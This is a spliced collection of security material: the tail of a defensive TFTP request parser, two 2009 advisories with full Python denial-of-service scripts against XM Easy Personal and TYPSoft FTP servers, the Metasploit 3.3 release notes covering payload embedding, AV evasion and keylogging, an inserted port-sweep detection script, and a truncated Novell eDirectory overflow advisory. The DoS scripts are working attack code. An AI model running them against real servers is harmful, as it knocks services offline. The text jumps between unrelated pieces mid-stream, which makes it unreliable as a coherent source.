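    """Take one NUL-terminated field off buf with a hard length limit.
    The limit is enforced before the bytes are used, which is the step a
    strcpy()-into-a-fixed-buffer implementation skips."""
    end = buf.find(b'\x00', 0, limit + 1)
    if end < 0:
        raise TftpError('%s missing terminator within %d bytes' % (what, limit))
    if end == 0:
        raise TftpError('%s is empty' % what)
    return buf[:end], buf[end + 1:]


def parse_request(packet):
    """Return (opcode, filename, mode) for a valid RRQ/WRQ, else raise."""
    if len(packet) < 4:
        raise TftpError('packet too short')
    opcode, = struct.unpack('!H', packet[:2])
    if opcode not in (RRQ, WRQ):
        raise TftpError('opcode %d is not a request' % opcode)
    name, rest = _cstring(packet[2:], MAX_FILENAME, 'filename')
    if not all(0x20 <= b < 0x7f for b in name):
        raise TftpError('filename contains non-printable bytes')
    mode, rest = _cstring(rest, max(map(len, MODES)), 'mode')
    mode = mode.decode('ascii', 'replace').lower()   # mode is case-insensitive
    if mode not in MODES:
        raise TftpError('unknown mode %r' % mode)
    if rest:
        raise TftpError('%d trailing bytes after mode' % len(rest))
    return opcode, name.decode('ascii'), mode


def check_request(packet):
    """Non-raising wrapper: (True, parsed) or (False, reason)."""
    try:
        return True, parse_request(packet)
    except TftpError as e:
        return False, str(e)


if __name__ == '__main__':
    print(check_request(GOOD_PACKET))
    print(check_request(CRASH_PACKET))
```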
Tuesday, November 24, 2009
XM Easy Personal FTP Server Remote DoS Vulnerability
Date of Discovery: 24-Nov-2009
Credits:leinakesi[at]gmail.com
Vendor: Dxmsoft
*******************************************************************************
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
*******************************************************************************
Overview:
XM Easy Personal FTP Server fails to handle more than 2000 files or folders in
the root directory.
*******************************************************************************
Details:
If you can log on to the server, take the following steps and the server will
crash, resulting in a DoS.
1.upload 2000 files or folders.
2.close the current connection.
3.use a ftp client to reconnect the server.
user ...
pass ...
port ...
list ...
crash!!!!!!
*******************************************************************************
Exploit example:
1.upload 2000 folders.
#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage: ./expl.py <hostname> <username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")

if len(sys.argv) != 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((hostname, 21))
except:
    print ("Connection error!")
    sys.exit(1)
r=sock.recv(1024)
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
# ten letters x 199 names each = 1990 directories, one MKD per name
for letter in "abcdefghij":
    for i in range(1,200):
        sock.send("mkd " + letter * i +"\r\n")
        print "[-] " + ("mkd " + letter * i +"\r\n")
        r=sock.recv(1024)
        print "[+] " + r + "\r\n"
sock.close()
sys.exit(0)
2.use a ftp client to reconnect the server
for example:
start->run->cmd->ftp 127.0.0.1->*****->*****->dir
TYPSoft FTP Server 'APPE' and 'DELE' Commands Remote DoS Vulnerabilities
Date of Discovery: 24-Nov-2009
Credits:leinakesi[at]gmail.com
Vendor: TYPSoft
Affected:
TYPSoft FTP Server Version 1.10
Earlier versions may also be affected
Overview:
TYPSoft FTP Server is an easy-to-use FTP server application. A denial of service vulnerability exists in TYPSoft FTP Server when the
"APPE" and "DELE" commands are used on the same socket connection.
Details:
If you can log on to the server successfully, take the following steps and the FTP server will crash, resulting in a
denial of service:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.send("DELE "+ test_string +"\r\n")
7.sock.close()
Severity:
High
Exploit example:
#!/usr/bin/python
import socket
import sys
import time

def Usage():
    print ("Usage: ./expl.py <local_ip> <hostname> <username> <password>\n")
    print ("Example:./expl.py 127.0.0.1 127.0.0.1 anonymous anonymous\n")
    print ("Example:./expl.py 192.168.48.183 192.168.48.111 anonymous anonymous\n")

if len(sys.argv) != 5:
    Usage()
    sys.exit(1)
else:
    local=sys.argv[1]
    hostname=sys.argv[2]
    username=sys.argv[3]
    passwd=sys.argv[4]

test_string="a"*30
ip_every=local.split('.')
# PORT argument: local address as h1,h2,h3,h4 plus port 122*256+107 = 31339
port_cmd = "PORT " + ",".join(ip_every) + ",122,107\r\n"
for i in range(1,10000):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("user %s\r\n" %username)
    print "[-] "+ ("user %s\r\n" %username)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("pass %s\r\n" %passwd)
    print "[-] "+ ("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] "+ r
    sock_data.bind((local,31339))
    sock_data.listen(1)
    sock.send(port_cmd)
    print "[-] "+ port_cmd
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("APPE "+ test_string +"\r\n")
    print "[-] "+ ("APPE "+ test_string +"\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("DELE "+ test_string +"\r\n")
    print "[-] "+ ("DELE "+ test_string +"\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
    sock.close()
    sock_data.close()
    time.sleep(2)
sys.exit(0)
Tuesday, November 17, 2009
Metasploit Framework 3.3 Released
We are excited to announce the immediate availability of version 3.3 of
the Metasploit Framework. This release includes 446 exploits, 216
auxiliary modules, and hundreds of payloads, including an in-memory VNC
service and the Meterpreter. In addition, the Windows payloads now
support NX, DEP, IPv6, and the Windows 7 platform. More than 180 bugs
were fixed since last year’s release of version 3.2, making this one of
the more well-tested releases yet.
- http://www.metasploit.com/framework/download/
Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used on
a wide range of hardware platforms, from massive Unix mainframes to the
Apple® iPhone™. Installers are available for the Windows and Linux
platforms, bundling all dependencies into a single package for ease of
installation. The latest version of the Metasploit Framework, as well as
images, video demonstrations, documentation and installation
instructions for many platforms, can be found online at
http://www.metasploit.com/framework/.
This release of the Metasploit Framework was driven by numerous key
contributors, including James Lee, Yoann Guillot, Steve Tornio, MC,
Chris Gates, Alexander Kornbrust, Ramon Carvalle, Stephen Fewer, Ryan
Linn, Lurene Grenier, Mike Kershaw, Patrick Webster, Max Moser, Efrain
Torres, Alexander Sotirov, Ty Bodell, Joshua Drake, JR, Carlos Perez,
Kris Katterjohn and many others.
The startup speed of the Metasploit Console and all utilities has been
greatly improved, thanks to performance patches by Yoann Guillot and a
string-processing overhaul by James Lee. Metasploit now fully supports
version 1.9.1 of the Ruby interpreter, clearing the way for support
under a variety of alternate Ruby VMs in the future.
The Windows installation now includes a fully-functional console
interface, using Cygwin and RXVT as a front-end to the framework. The
Windows installer now runs on all supported versions of Windows, from
Windows 2000 to Windows 7. The Windows version of Metasploit is now
portable and can be silently installed via the /S /D=Dest parameters.
The Linux installers now include everything needed to run the Metasploit
Framework on most versions of Linux released over the last five years.
The official Linux installers are recommended for anyone using a Linux
distribution other than Ubuntu (8.04+). These installers include Ruby
1.9.1, Subversion 1.6.6, and all dependencies, along with convenient
scripts for keeping the framework updated.
The Metasploit Console now indicates how many days have passed since the
last update, reminding users when their installation becomes out of
date. The console now uses a Ruby implementation of the Readline library
by default, solving a number of issues with Mac OS X and other platforms
with broken Readline support. The console now supports and enables ANSI
colors by default, making it much easier to discern between errors and
status messages on a busy terminal.
The database functionality is now enabled by default, as long as RubyGems
and at least one database driver are available on the system. The
db_drivername plugins are deprecated, and the db_driver and db_create
commands are active by default. The db commands now support filters for
everything from open ports to IP ranges. The db_autopwn command now
cross-references across multiple ports and service names instead of a
single port when the -p parameter is supplied.
All applicable exploits now have OSVDB references, thanks to a major
effort by Steve Tornio. Two-way links have been set up between the
Metasploit module browser and the matching OSVDB entries. CVE
references have been audited across the entire module tree, with a
number of typos and other errors corrected in the process.
Oracle exploit support has been implemented through a tag-team effort
between MC and Chris Gates, with assistance from Alexander Kornbrust.
Oracle modules have been developed for exploiting the TNS protocol stack and
Web-based Oracle services, as well as post-authentication database-level
privilege escalation flaws. Microsoft SQL Server support has been
overhauled, with the addition of a brand new native Ruby TDS driver
exclusive to the Metasploit Framework and a large number of new modules.
Microsoft SQL Server 2000 through 2008 versions have been tested with
the new modules. The MSSQL and Oracle login modules can now brute force
passwords from a dictionary file.
Automated client-side exploitation has been overhauled with a rewrite of
the browser_autopwn module by James Lee. A number of existing
client-side exploits have been updated to use better fingerprinting and
evasion techniques. All TCP-based exploits can now be launched through
SOCKS4, SOCKS5, and HTTP proxies.
The payload encoding library can now embed Metasploit payloads into
arbitrary executables. The -x parameter to msfencode allows an arbitrary
executable to be used as a vector for a Metasploit payload. This
significantly reduces the impact of anti-virus tests during penetration
tests and allows the use of familiar executables in social engineering
endeavors. Payloads can be generated as VBA macros for insertion into
Word documents, as Windows Scripting Hosts scripts and the standard
formats (C, Ruby, Javascript, etc).
Metasploit now supports 64-bit Windows as a target platform, with the
ability to use standard stagers, generate executables with embedded
payloads and load Meterpreter on 64-bit systems. Metasploit now supports
64-bit Linux on the PowerPC architecture as a target platform. The
alphanumeric encoders have seen a number of bug fixes and improvements
since version 3.2, including the ability to prepend alphanumeric GetEIP
code via the AllowWin32SEH parameter.
AIX support as a target platform has been improved, with a number of
additional payloads and an exploit module for the newly discovered
rpc_ttdbserverd realpath vulnerability. These payloads support versions
5.3.7 through 6.1.4 of the AIX platform and work with auxiliary modules
and the database to select the right syscall numbers for each particular
operating system revision. 32-bit PowerPC support now includes POWER and
Cell Broadband chips in the supported architecture set through an effort
by Ramon Carvalle of RiSE Security.
The reverse_tcp stager now has a configurable number of retries
(ReverseConnectRetries) and exits gracefully if the connection fails.
The reverse_tcp_allports stager will cycle through all possible outbound
ports in order to punch through host or network firewalls. The standard
Windows stagers were overhauled to use a new hashing method, support
Windows 7, allocate their own memory during staging and avoid a middle
stager by performing their own reliable transfer mechanism. The new
stager development was driven by Stephen Fewer of Harmony Security.
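An added defender-side example, not code from the Metasploit release above: a stager that walks every outbound port toward one address leaves a run of consecutive destination ports in perimeter logs, and this script flags that pattern. The log format and sample lines are constructed assumptions, not a real firewall's output.

```python
import re
from collections import defaultdict

# Assumed (constructed) firewall-log layout: <timestamp> <src_ip> <dst_ip> <dst_port> <action>
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (ALLOW|DENY)$")

def parse_line(line):
    """Return (ts, src, dst, port, action) or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, src, dst, port, action = m.groups()
    return ts, src, dst, int(port), action

def longest_consecutive_run(ports):
    """Length and starting port of the longest run of consecutive port numbers."""
    best_len, best_start = 0, None
    run_len, run_start, prev = 0, None, None
    for p in sorted(set(ports)):
        if prev is not None and p == prev + 1:
            run_len += 1
        else:
            run_len, run_start = 1, p
        if run_len > best_len:
            best_len, best_start = run_len, run_start
        prev = p
    return best_len, best_start

def find_port_sweeps(lines, min_run=20):
    """Flag (src, dst) pairs that walked at least min_run consecutive destination ports."""
    ports_by_pair = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            _, src, dst, port, _ = rec
            ports_by_pair[(src, dst)].append(port)
    hits = {}
    for pair, ports in ports_by_pair.items():
        run, start = longest_consecutive_run(ports)
        if run >= min_run:
            hits[pair] = (start, start + run - 1, run)
    return hits

# Constructed sample: one internal host tries ports 1..45 toward a single external
# address (the allports pattern), plus ordinary web traffic from another host.
SAMPLE_LINES = [f"2009-11-01T10:00:{i % 60:02d} 10.0.0.5 203.0.113.7 {i} DENY" for i in range(1, 46)]
SAMPLE_LINES += ["2009-11-01T10:01:00 10.0.0.9 203.0.113.7 80 ALLOW",
                 "2009-11-01T10:01:02 10.0.0.9 203.0.113.7 443 ALLOW"]

if __name__ == "__main__":
    for (src, dst), (lo, hi, n) in find_port_sweeps(SAMPLE_LINES).items():
        print(f"possible allports sweep: {src} -> {dst} ports {lo}-{hi} ({n} ports)")
```

Tune min_run to the environment; port scanners produce the same signature, so the hit is a triage lead, and the source host's process list is the next place to look.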
Support for JSP payloads has been integrated, opening the door for new
exploit modules for Java-based application engines, like Bea and Tomcat.
The existing CMD, PHP, Ruby and Perl payloads have all seen a revamp and
update to their compatibility-matching system.
Auxiliary scanner modules now instantiate a new module instance for each
thread, allowing more of the exploit mixins to be used to develop
network scanners. This greatly improved the reliability of the existing
scanners and allowed for dozens of new ones to be developed. Scanner
modules now report their progress as they scan the network and the
frequency of reports can be controlled through advanced options.
A simple fuzzer API has been added as a mixin, along with over a dozen
new fuzzer modules that demonstrate their use and capabilities. While
fuzzing is not the focus of the framework, the API is easy to use and
can meet the requirements of many on-the-spot service tests. Ryan Linn's
HTTP NTLM capture module has been integrated into the framework.
Support for the DECT COM-ON-AIR driver has been integrated into
Metasploit, along with two example modules for locating DECT base
stations and detecting active calls. The Lorcon2 library is now
supported through a new ruby-lorcon2 Ruby extension and exploit mixin.
All existing modules using the old Lorcon API have been ported. The
airpwn and dnspwn modules developed by Mike Kershaw (also one of the
Lorcon2 authors) have been integrated into the framework. The pcaprub
Ruby extension has been updated to build on Ruby 1.9.1. Max Moser's
pSnuffle packet sniffer (modeled after dsniff) has been integrated into
the framework.
The Meterpreter and VNC injection payloads now use Stephen Fewer's
Reflective DLL injection technique; the previous DLL injection stages
have been renamed and will be deprecated in a future release. The
Meterpreter now negotiates a full SSL link after the staging process has
been completed, even going so far as to fake an HTTP request over the SSL
session to mimic the traffic profile of a normal web browser. The
Meterpreter AutoRunScript parameter can now support multiple scripts with
arguments. The Meterpreter can now take screen shots, provided that the
process has access to the desktop (e.g. migrated into explorer.exe),
using the ESPIA extension developed by Efrain Torres.
The Meterpreter can now capture traffic from the compromised system,
using an in-memory sniffing extension based on the MicroOLAP Packet
Sniffing SDK. This feature creates a ring buffer of up to 200,000
packets, allowing a snapshot to be downloaded and converted to a
standard pcap log file. The Meterpreter can now capture keystrokes,
including those of console logins, by migrating into the appropriate
process and using the keyscan commands. The long-missing "rm" command
has finally been added to the Meterpreter command line. The "background"
command has been added for situations when using ^Z is not feasible.
Alexander Sotirov's METSVC has been added to the framework and a
Meterpreter script has been included to automatically deploy it on a
compromised system.
The beginnings of POSIX support have been implemented by JR, targeting
the Linux and BSD platforms. The stdapi extension for POSIX has been
partially completed and should continue to improve going forward.
All Meterpreter scripts now support the "-h" parameter for usage. As of
Metasploit 3.3, there are almost 30 different Meterpreter scripts
included in the release, many of which were exclusively written by
Carlos Perez.
Enjoy the release!
-HD
Hellcode Research: Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability
Vendor: Novell
Product: eDirectory for Windows
Version: 8.8 SP5
Vulnerability: Stack Overflow
Description:
Vulnerability is in "/dhost/httpstk"
This vulnerability allows remote attackers to execute arbitrary code
on vulnerable installations of Novell eDirectory.
The specific flaw exists in the handling of URL parameters
when posting to the login form of the HTTPSTK web server.
(


